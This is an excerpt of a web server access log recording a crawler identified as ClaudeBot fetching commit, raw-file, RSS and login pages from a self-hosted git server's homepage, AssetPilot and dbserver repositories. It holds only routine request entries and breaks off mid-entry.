[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 23531] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Contact.tsx" [Client 216.73.216.188] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good?display=source" [Client 216.73.216.188] [Length 20261] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 216.73.216.188] [Length 12752] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/About.tsx" [Client 216.73.216.188] [Length 826] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/About.tsx" [Client 216.73.216.188] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fapp%2Fdatabase.py" [Client 216.73.216.188] [Length 25243] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Hero.tsx" [Client 216.73.216.188] [Length 824] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fmain.py" [Client 216.73.216.188] [Length 49561] [Gzip 8.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good?display=source" [Client 216.73.216.188] [Length 20456] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 22577] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 21735] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2FProgram.cs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good?display=rendered" [Client 216.73.216.188] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good?display=rendered" [Client 216.73.216.188] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py?display=source" [Client 216.73.216.188] [Length 12961] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py?display=source" [Client 216.73.216.188] [Length 12974] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.3" [Client 216.73.216.188] [Length 56776] [Gzip 9.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2Fobj" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10422] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 11127] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 23694] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2?display=rendered" [Client 216.73.216.188] [Length 10888] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2FDOCKER_GUIDE.md" [Client 216.73.216.188] [Length 37517] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 23560] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fservices%2FgeminiService.ts" [Client 216.73.216.188] [Length 24973] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 20763] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html?display=rendered" [Client 216.73.216.188] [Length 14703] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.gitignore" [Client 216.73.216.188] [Length 25260] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html?display=rendered" [Client 216.73.216.188] [Length 14579] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2?display=rendered" [Client 216.73.216.188] [Length 10892] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log.2" [Client 216.73.216.188] [Length 46138] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 20597] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 216.73.216.188] [Length 9900] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Ffallback_stream_access.log" [Client 216.73.216.188] [Length 21154] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9777] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt.log" [Client 216.73.216.188] [Length 42681] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 22771] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2Fglobal.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js?display=rendered" [Client 216.73.216.188] [Length 10880] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 12369] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html?display=rendered" [Client 216.73.216.188] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" [Client 216.73.216.188] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 11646] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11645] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 14303] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Findex.html" [Client 